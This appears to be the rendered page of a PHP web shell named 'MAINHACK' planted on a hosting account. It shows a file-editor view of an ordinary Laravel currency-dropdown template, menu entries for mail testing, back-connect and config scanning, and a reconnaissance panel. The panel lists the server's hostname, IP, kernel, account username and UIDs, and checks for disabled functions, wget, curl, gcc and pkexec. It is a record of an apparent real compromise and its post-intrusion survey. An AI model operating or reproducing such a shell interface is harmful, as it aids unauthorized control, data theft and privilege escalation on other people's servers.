[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 28c8815ac4799a2cc0deeaaf78755e2ab3342fbd.php
<?php if(!empty($currencies) and count($currencies)): ?> <?php $userCurrency = currency(); $matchesCurrency = $currencies->first(); foreach($currencies as $currencyItem) { if($userCurrency == $currencyItem->currency) { $matchesCurrency = $currencyItem; } } ?> <div class="js-currency-select custom-dropdown position-relative admin-navbar-currency mr-2 mr-md-3"> <form action="/set-currency" method="post" class="mb-0"> <?php echo e(csrf_field()); ?> <input type="hidden" name="currency" value="<?php echo e($userCurrency); ?>"> <?php if(!empty($previousUrl)): ?> <input type="hidden" name="previous_url" value="<?php echo e($previousUrl); ?>"> <?php endif; ?> <?php if(!empty($matchesCurrency)): ?> <div class="custom-dropdown-toggle d-flex align-items-center cursor-pointer w-100"> <div class="mr-1 text-black"> <span class="js-lang-title font-14"><?php echo e($matchesCurrency->currency); ?> (<?php echo e(currencySign($matchesCurrency->currency)); ?>)</span> </div> <i class="fa fa-chevron-down"></i> </div> <?php endif; ?> </form> <div class="custom-dropdown-body py-2"> <?php $__currentLoopData = $currencies; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $currencyItem): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="js-currency-dropdown-item custom-dropdown-body__item cursor-pointer <?php echo e(($userCurrency == $currencyItem->currency) ? 'active' : ''); ?>" data-value="<?php echo e($currencyItem->currency); ?>" data-title="<?php echo e($currencyItem->currency); ?> (<?php echo e(currencySign($currencyItem->currency)); ?>)"> <div class=" d-flex align-items-center w-100 px-2 py-1 text-gray bg-transparent"> <div class="size-32 position-relative d-flex-center bg-gray100 rounded-sm"> <?php echo e(currencySign($currencyItem->currency)); ?> </div> <span class="ml-1 font-14"><?php echo e(currenciesLists($currencyItem->currency)); ?></span> </div> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> </div> <?php endif; ?> <?php /**PATH /home/aoneqssk/public_html/resources/views/admin/includes/navbar/currency.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285